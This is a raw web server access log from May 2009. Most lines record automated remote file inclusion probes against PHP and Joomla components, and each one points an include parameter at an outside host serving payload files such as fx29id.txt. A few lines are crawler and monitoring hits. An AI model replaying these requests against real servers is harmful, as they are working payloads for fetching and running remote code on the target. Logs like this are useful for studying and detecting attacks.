65.98.80.2 - - [30/May/2009:00:00:02 -0400] "GET /logs/access_log.Q109052100%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:00:13 -0400] "GET /logs/access_log.Q109052100%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:00:18 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:00:19 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:00:20 -0400] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
87.106.135.14 - - [30/May/2009:00:00:22 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
87.106.135.14 - - [30/May/2009:00:00:22 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
218.185.20.88 - - [30/May/2009:00:00:23 -0400] "GET /logs/access_log.Q109051500//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
218.185.20.88 - - [30/May/2009:00:00:23 -0400] "GET /logs/access_log.Q109050700//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
210.56.19.13 - - [30/May/2009:00:00:27 -0400] "GET /images/login_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
210.56.19.13 - - [30/May/2009:00:00:27 -0400] "GET /images/psearch_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.195.248.50 - - [30/May/2009:00:00:33 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
82.195.248.50 - - [30/May/2009:00:00:33 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:00:36 -0400] "GET /logs/access_log.Q109052100%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:00:47 -0400] "GET /logs/access_log.Q109050700%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:00:47 -0400] "GET /logs/access_log.Q109050300%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:00:49 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:00:50 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:00:50 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:00:51 -0400] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:00:51 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:00:51 -0400] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
216.221.10.116 - - [30/May/2009:00:00:53 -0400] "GET /logs/access_log.Q109052100%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
216.221.10.116 - - [30/May/2009:00:01:00 -0400] "GET /logs/access_log.Q109050300%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:01:03 -0400] "GET /logs/access_log.Q109050300%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:01:07 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:01:07 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:01:08 -0400] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:01:11 -0400] "GET /logs/access_log.Q109050300%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:01:12 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:01:13 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:01:13 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:01:13 -0400] "GET /logs/access_log.Q109051500//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:01:13 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:01:13 -0400] "GET /logs/access_log.Q109051500//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:01:16 -0400] "GET /logs/access_log.Q109050700%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:01:16 -0400] "GET /logs/access_log.Q109050700%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:01:25 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:01:26 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:01:26 -0400] "GET /logs/access_log.Q109051500//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:01:29 -0400] "GET /logs/access_log.Q109050700%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:01:29 -0400] "GET /logs/access_log.Q109050700//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:00:01:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.98.80.2 - - [30/May/2009:00:02:09 -0400] "GET /logs/access_log.Q109050700//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:02:10 -0400] "GET /logs/error_log.Q109050800//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:02:24 -0400] "GET /logs/access_log.Q109050700//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:02:24 -0400] "GET /logs/error_log.Q109050800//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
220.181.7.97 - - [30/May/2009:00:02:32 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
69.16.193.132 - - [30/May/2009:00:03:17 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://tycsport.twbbs.org///blps/dyna/data/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.16.193.132 - - [30/May/2009:00:03:17 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://tycsport.twbbs.org///blps/dyna/data/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.16.193.132 - - [30/May/2009:00:03:17 -0400] "GET /logs/access_log.Q108021800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://tycsport.twbbs.org///blps/dyna/data/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.16.193.132 - - [30/May/2009:00:03:22 -0400] "GET /logs/access_log.Q108072800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://tycsport.twbbs.org///blps/dyna/data/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:03:26 -0400] "GET //tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:03:26 -0400] "GET /logs/access_log.Q109052100%20%20//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:03:26 -0400] "GET /logs//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:03:27 -0400] "GET //tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:03:27 -0400] "GET /logs//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:03:27 -0400] "GET /logs/access_log.Q109052100%20%20//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:03:28 -0400] "GET /logs/access_log.Q109052100//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:03:28 -0400] "GET //tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:03:28 -0400] "GET /logs//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
123.125.64.38 - - [30/May/2009:00:03:47 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
216.221.10.116 - - [30/May/2009:00:03:51 -0400] "GET /logs//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
216.221.10.116 - - [30/May/2009:00:03:51 -0400] "GET /logs/access_log.Q109052100%20%20//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.221.10.116 - - [30/May/2009:00:03:51 -0400] "GET //tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
211.241.40.51 - - [30/May/2009:00:04:21 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.usher.co.kr//fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.241.40.51 - - [30/May/2009:00:04:21 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.usher.co.kr//fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.241.40.51 - - [30/May/2009:00:04:22 -0400] "GET /logs/access_log.Q108021800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.usher.co.kr//fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.241.40.51 - - [30/May/2009:00:04:29 -0400] "GET /logs/access_log.Q108072800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.usher.co.kr//fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.120.237.150 - - [30/May/2009:00:04:39 -0400] "GET /logs/access_log.Q109052200//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 226 "-" "libwww-perl/5.811"
216.120.237.150 - - [30/May/2009:00:04:39 -0400] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 200 452 "-" "libwww-perl/5.811"
216.120.237.150 - - [30/May/2009:00:04:39 -0400] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 200 3433 "-" "libwww-perl/5.811"
69.16.193.132 - - [30/May/2009:00:05:07 -0400] "GET /logs/access_log.Q108021800%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://tycsport.twbbs.org///blps/dyna/data/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
69.16.193.132 - - [30/May/2009:00:05:07 -0400] "GET /logs/access_log.Q108072800%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://tycsport.twbbs.org///blps/dyna/data/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:05:15 -0400] "GET /logs/error_log.Q109052000%20%20//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:05:43 -0400] "GET /logs/access_log.Q109052100%20%20//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:05:50 -0400] "GET /logs/access_log.Q109052100//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:05:54 -0400] "GET /logs/error_log.Q109052000%20%20//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
216.221.10.116 - - [30/May/2009:00:05:55 -0400] "GET /logs/error_log.Q109052000%20%20//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:06:01 -0400] "GET /logs/error_log.Q109052100//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:06:26 -0400] "GET /logs/access_log.Q109052100//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:00:06:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.120.237.150 - - [30/May/2009:00:06:56 -0400] "GET /logs/access_log.Q109051100//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 226 "-" "libwww-perl/5.811"
216.221.10.116 - - [30/May/2009:00:06:58 -0400] "GET /logs/access_log.Q109052100//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.241.40.51 - - [30/May/2009:00:07:18 -0400] "GET /logs/access_log.Q108021800%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.usher.co.kr//fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:07:29 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:07:29 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:07:30 -0400] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:07:37 -0400] "GET /logs/access_log.Q109050700%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:08:00 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:08:01 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:08:01 -0400] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:08:02 -0400] "GET /logs/error_log.Q109052000%20%20//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:08:10 -0400] "GET /logs/access_log.Q109050700%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:08:23 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:08:23 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:08:23 -0400] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:08:25 -0400] "GET /logs/error_log.Q109052000//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:08:28 -0400] "GET /logs/access_log.Q109050700%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:08:44 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:08:44 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:08:44 -0400] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
216.221.10.116 - - [30/May/2009:00:08:55 -0400] "GET /logs/error_log.Q109052000//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:08:56 -0400] "GET /logs/access_log.Q109050700%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
216.221.10.116 - - [30/May/2009:00:08:58 -0400] "GET /logs/error_log.Q109052100//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:00:09:11 -0400] "GET /logs/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:00:09:11 -0400] "GET /errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:00:09:11 -0400] "GET /logs/access_log.Q109051500/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:00:09:17 -0400] "GET /logs/access_log.Q109051600/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:09:32 -0400] "GET /logs/error_log.Q109052000//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:09:41 -0400] "GET /logs/error_log.Q109052000//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.25.133.199 - - [30/May/2009:00:10:12 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.runway34.ch/cms/r0x.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.803"
209.25.133.199 - - [30/May/2009:00:10:12 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.runway34.ch/cms/r0x.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.803"
209.25.133.199 - - [30/May/2009:00:10:12 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.runway34.ch/cms/r0x.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.803"
209.25.133.199 - - [30/May/2009:00:10:13 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.runway34.ch/cms/r0x.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.803"
85.214.83.196 - - [30/May/2009:00:10:20 -0400] "GET /logs/access_log.Q109050700//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
69.16.193.132 - - [30/May/2009:00:10:37 -0400] "GET /config.php?path_to_root=http://tycsport.twbbs.org///blps/dyna/data/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.16.193.132 - - [30/May/2009:00:10:37 -0400] "GET /logs/access_log.Q109052100%20%20/config.php?path_to_root=http://tycsport.twbbs.org///blps/dyna/data/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.16.193.132 - - [30/May/2009:00:10:37 -0400] "GET /logs/config.php?path_to_root=http://tycsport.twbbs.org///blps/dyna/data/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
